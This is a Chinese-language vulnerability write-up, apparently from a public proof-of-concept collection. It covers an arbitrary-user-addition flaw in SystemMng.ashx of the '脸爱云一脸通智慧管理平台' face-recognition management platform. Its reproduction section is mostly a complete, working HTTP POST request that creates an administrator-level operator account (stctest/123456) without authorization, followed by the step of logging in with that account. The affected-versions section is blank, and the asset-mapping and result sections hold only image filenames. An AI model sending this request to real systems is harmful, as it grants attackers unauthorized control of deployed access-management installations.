脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞

一、漏洞简介

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞。攻击者可通过该漏洞获取应用权限。

二、影响版本

三、资产测绘

1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png

四、漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

operatorName=stctest&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

1700649221299-828e61a4-94f2-4098-9d57-743b83272090.png

使用添加的账号stctest/123456登录系统

1700649249316-20c950fe-5d84-4d4d-8e9d-ec42c5066ac3.png

更新: 2024-02-29 23:55:45
原文: https://www.yuque.com/xiaokp7/ocvun2/txdammysmosfwe7o